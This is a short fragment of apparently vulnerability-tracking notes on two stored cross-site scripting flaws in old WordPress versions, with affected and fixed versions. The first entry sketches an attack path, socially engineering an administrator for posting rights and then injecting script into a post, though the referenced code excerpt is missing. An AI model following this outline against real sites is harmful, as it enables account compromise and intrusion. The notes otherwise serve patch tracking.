1. WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS) (ID: 8111)

• Summary:
  • Vulnerability types: XSS
  • Tested in version: <= 4.2.2
  • Fixed in version: 4.2.3

  • "Social engineer" the administrator to give you posting privileges (Author/Contributor role)
  • Exploit WordPress HTML processing by XSSing inside a post with the following code excerpt:

2. WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds (ID: 8768)

• Summary:

  • Tested in version: 4.0-4.7.2
  • Fixed in version: 4.7.3
